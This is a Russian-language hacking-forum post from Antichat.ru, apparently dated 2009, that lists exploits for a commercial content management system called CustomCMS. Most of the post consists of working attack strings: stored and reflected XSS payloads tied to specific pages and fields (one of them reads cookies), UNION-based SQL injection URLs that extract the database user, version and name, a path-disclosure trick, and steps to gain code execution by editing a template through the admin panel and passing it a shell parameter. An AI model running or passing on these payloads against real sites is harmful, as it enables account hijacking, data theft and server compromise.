|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
CustomCMS (CCMS)
Цена: ~55 $
Активная XSS
/inbox.html
В теле письма
"><script>alert();</script>
/notepad.html
</textarea><script>alert(document.cookie);</script>
/index.php?page=Edit+Profile
Уязвимы все поля
"><script>alert();</script>
/newthread-1.html
В Title
<script>alert();</script>
Пассивные XSS
/pm.php?action=Send&rec=1"><script>alert();</script>
/gamesearch.html
в поле Search
"><script>alert();</script>
/index.php?page=Articles&action=showarticle&id="><s cript>alert();</script>
SQL Инъекции:
/link.php?id=-1'+unIon+select+1,2,3,4,5,6,7,concat_ws(0x3a,user( ),version(),database()),9,10,11+--+
Будет 404
У меня например вывелось.
Forbidden
You don't have permission to access /root@localhost:5.0.45-community-nt:cccms on this server.
/ad_out.php?id=-1'+union+select+1,2,3,4,5,6,7,8,9,10/*
6 Поле делат редирект.
/index.php?page=Files&action=showfile&id=1'+union+s elect+1,2,3,concat_ws(0x3a,user(),version(),databa se()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,2 1,22,23,24,25,26/*
/index.php?page=Companies&action=show&t=Agetec'+uni on+select+1,concat_ws(0x3a,user(),version(),databa se()),3,4,5,6,7,8+--+
Раскрытие путей
/thumbnailer.php?type []=avatar
Выполнение произвольного кода через админку:
/admincp/index.php?page=Settings&op=Templates&action=edit&f ile=company.php
/templates/company.php?shell=phpinfo();
PS
Боже мой...
(с) Ctacok Специально для Antichat.ru
Последний раз редактировалось Ctacok; 15.12.2009 в 07:10..
|